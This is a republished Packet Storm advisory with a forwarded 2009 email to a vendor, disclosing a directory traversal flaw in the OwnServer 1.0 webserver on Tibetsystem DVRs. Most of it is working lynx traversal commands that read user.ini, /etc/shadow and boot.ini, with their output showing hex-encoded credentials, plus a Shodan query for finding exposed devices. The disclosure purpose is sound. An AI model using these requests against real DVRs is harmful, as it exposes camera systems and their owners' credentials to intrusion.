Tibetsystem DVRs use the OwnServer 1.0 webserver that suffers from a directory traversal vulnerability.
56f3e8aa61901f737d73f53b412cb750I tried to report this to the vendor in 2009. SHODAN "OwnServer1.0":
Results 1 - 10 of about 11832 for OwnServer1.0 country:US.
-Jason Ellison
---------- Forwarded message ----------
From: Jason Ellison <infotek@gmail.com>
Date: Fri, Apr 10, 2009 at 5:02 PM
Subject: DVR Security Issue
To: sales@tibetsystem.com
Hello,
I am a I.T. consultant in the U.S. I have
discovered a security flaw in your product. Please forward to the
appropriate person in your company (software engineer maybe?).
Tibetsystem DVR security issue:
Your Windows and Linux based DVR use the same webserver,
"OwnServer1.0"... This web server has a directory traversal
vulnerability that was discovered in 2004. This can be used to get
the usernames and passwords of the DVR (or any local file). The
usernames and passwords are Hex encoded ASCII.
In addition to this the webapp delivers the complete server config
including ALL valid usernames and passwords if you give proper
authentication. So if I login using default anonymous:blank, all
accounts and passwords are delivered in clear text.
Is there an update for this issue?
$ lynx -source http://a.b.c.d/../../../../../../../home/dvr/sdvr/kdvr/user.ini
[@Sdvr]
validate=1
[user_time]
admin=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
anonymous=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
[users]
admin=61646D696E000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FF130000FFFF00000000000000000000000000000000000019
anonymous=616E6F6E796D6F75730000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001A0000FFFFFF
$ lynx -source http://a.b.c.d/../../windows/dvr2.ini
[generic]
encoder=0
dual_streaming=1
[dfs3]
current_path=E:\dfs
recycle=1
retain=0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
record_path=F:\dfs;E:\dfs;
[Viewer]
run=C:\dvr\remote.exe,5.5.0.0
setup=C:\dvr\client\clientinstall.exe,5.5.0.0
[user_time]
admin=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
anonymous=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
[user32]
admin=61646D696E000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FF930000FFFF00000000000000000000000000000000000099
anonymous=616E6F6E796D6F75730000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0000FFFFFFFF130000001300000013000000130000003B
lynx -source http://10.10.10.56/../../../../../../../etc/shadow
root:$1$q0HFBbpi$removed:13328:0:99999:7:::
bin:*:13328:0:99999:7:::
daemon:*:13328:0:99999:7:::
adm:*:13328:0:99999:7:::
lp:*:13328:0:99999:7:::
sync:*:13328:0:99999:7:::
shutdown:*:13328:0:99999:7:::
halt:*:13328:0:99999:7:::
mail:*:13328:0:99999:7:::
news:*:13328:0:99999:7:::
uucp:*:13328:0:99999:7:::
operator:*:13328:0:99999:7:::
games:*:13328:0:99999:7:::
nobody:*:13328:0:99999:7:::
rpm:!!:13328::::::
messagebus:!!:13328::::::
haldaemon:!!:13328::::::
vcsa:!!:13328::::::
xfs:!!:13328::::::
rpc:!!:13328::::::
rpcuser:!!:13328::::::
clamav:!!:13328::::::
sshd:!!:13328::::::
quess:$1$tpvrlLSt$removed:13328:0:99999:7:::
$ lynx -source http://a.b.c.d/../../boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Home
Edition" /noexecute=optin /fastdetect
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2004-01/0184.html
OwnServer 1.0 Directory Transversal Vulnerability
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!